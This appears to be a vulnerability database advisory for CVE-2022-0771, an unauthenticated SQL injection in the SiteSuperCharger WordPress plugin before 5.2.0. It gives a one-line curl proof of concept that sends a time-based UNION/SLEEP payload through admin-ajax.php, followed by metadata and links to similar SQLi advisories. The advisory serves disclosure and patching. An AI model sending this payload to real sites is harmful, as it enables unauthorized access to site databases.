SiteSuperCharger < 5.2.0 – Unauthenticated SQLi | CVE 2022-0771 | Plugin Vulnerabilities

Description

The plugin does not validate, sanitise and escape various user inputs before using them in SQL statements via AJAX actions (available to both unauthenticated and authenticated users), leading to Unauthenticated SQL Injections

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data '0=images+UNION+SELECT+1+from+wp_users+WHERE+1+%3d+(SELECT+SLEEP(1))+--+&1=.&action=processGroup'

Affects Plugins

sitesupercharger

Fixed in 5.2.0

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

6139e732-88f2-42cb-9dc3-42ad49731e75

Timeline

Publicly Published

2022-04-11 (about 2 years ago)

Added

2022-04-11 (about 2 years ago)

Last Updated

2022-04-17 (about 2 years ago)

Other

Published

Title

Published

2023-01-12

Title

Survey Maker < 3.1.2 - Subscriber+ SQLi

Published

2023-10-03

Title

Copy Or Move Comments <= 5.0.4 - Authenticated (Subscriber+) SQL Injection

Published

2021-07-24

Title

Diary & Availability Calendar <= 1.0.3 - Authenticated (subscriber+) SQL Injection

Published

2022-05-09

Title

Cube Slider <= 1.2 - Admin+ SQLi

Published

2022-10-17

Title

WP < 6.0.3 - SQLi in WP_Date_Query